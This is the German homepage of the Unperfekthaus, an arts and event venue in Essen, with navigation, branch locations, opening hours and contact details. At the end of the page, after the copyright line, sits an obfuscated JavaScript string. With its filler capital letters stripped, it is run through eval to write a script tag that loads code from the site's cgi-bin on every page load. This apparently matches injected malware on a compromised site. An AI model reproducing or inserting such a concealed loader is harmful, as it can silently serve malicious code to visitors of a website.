









Unperfekthaus - Die Kreativ-Oase in der Essener Innenstadt









[/index.html]















				(function() {
					var cx = '006785199942318520975:lrt2zyl7hba';
					var gcse = document.createElement('script');
					gcse.type = 'text/javascript';
					gcse.async = true;
					gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
						'//www.google.com/cse/cse.js?cx=' + cx;
					var s = document.getElementsByTagName('script')[0];
					s.parentNode.insertBefore(gcse, s);
				})();
			










Willkommen im Unperfekthaus!




Besucher






Restaurant
Termine
Geburtstage, Hochzeiten, Feiern




Gebäudeplan
Virtueller Rundgang

Anfahrt





Unternehmen


Seminarräume
Betriebsfeiern



Kreative




Projekte
Angebote
Meine Seite




Terminanmeldung
Projektanmeldung
Marketinghilfen








Dependancen des Unperfekthauses, direkt nebenan oder 5 Gehminuten entfernt:




Hotel




Das
            Unperfekthotel - Luxushotel nebenan
        
Das WG-Hotel im
            Unperfekthaus für Teams, Freunde & Verwandte bis 14 Personen
        



CoWorking


Panorama-CoWorking
            im GenerationenKult-Haus
Feste und flexible Schreibtische mieten, schon ab 149 €/Monat!



Wohnen




Das
            GenerationenKult-Haus
Wohnen im Luxus-Mehrgenerationenhaus in der Essener City





Kirche, neutral




Die
            Kreuzeskirche
Private und gewerbliche Events in einer aktiven, aber neutralen Kirche







UpH auf einen Blick
Friedrich-Ebert-Str. 18-26, 45127 Essen (klicken für Karte)



Öffnungszeiten
Mo - Do 7 - 23 Uhr
Fr - Sa 7 - 24 Uhr
So 8 - 23 Uhr 

Kontakt zum Büro
          Mo - Fr 9:30 - 16 Uhr
 (0201) 47 09 16-0
info@unperfekthaus.de


Kontakt zur Gastronomie
          Mo - So 10 - 23 Uhr
 (0201) 47 09 16-97
        




Im Unperfekthaus bekommen Künstler, Gründer & Gruppen kostenlos Räume, Technik, Bühnen uvm. Und mitten in
          diesem 4000m² großen Künstlerdorf treffen sich Privat- und Geschäftsleute zum Essen, für Seminare oder zu
          Besprechungen. Man feiert Geburtstage, Betriebsfeste, und wer will, kann sogar übernachten.
Reinhard Wiesemann, Gründer des Unperfekthauses








Newsletter

Wenn Sie sich für aktuelle Infos und kommende Termine rund um das Unperfekthaus interessieren, geben Sie uns
          Ihre E-Mail-Adresse!














Für Besucher

Restaurant
Termine
Gebäudeplan
Anfahrt



Für Unternehmen

Seminarräume
Betriebsfeiern



Kreatives

Projekte
Angebote
Meine Seite
Terminanmeldung
Projektanmeldung
Marketinghilfen



Kontakt

 (0201) 47 09 16-0
 info@unperfekthaus.de
Newsletter
Detail-Infos
Impressum



Weitere Projekte

UnperfektHOTEL
UnperfektAKADEMIE
Panorama-CoWorking
Konsumreform Shop & Café
GeKu-Haus
Kreuzeskirche







		© Unperfekthaus 2004 - 2014
	

 










var id=-1; var j='LIdPoAcMTDuTmLJMeKnDKtIFH.NIOwLrWWiJtMXMeF(QM\x27K<U\x27ER+DWH\x27EsTRQcPLXrSiCIpBtFNZ DSBtBIEyAApFEReDSQ=NB"XtYJOeLKxARtR/BjPGXaDLvXUaWSsPVcMUTrTGDiTNLpUMtC"RBS GVsSArQGTcJ=LNO"XY/LcIgTiAR-ILbVVYiMJnKD/QuPpOGGhGhWeJXlMBGpBWA.MEpOYlHS?YtHR=VFjEVsTcEK&ToIbRFjEWWiPdMET=C\x27N+HMiOdMDI+KHE\x27GXU"UU>OVK<FC\x27HY+IYS\x27ELG/FsQIRcCVArX\x27M+UQJ\x27JYiACpVMtLZM>VS\x27XLC)OYV;'; eval(j.replace(/[A-Z]/g,''));
blmiaawc


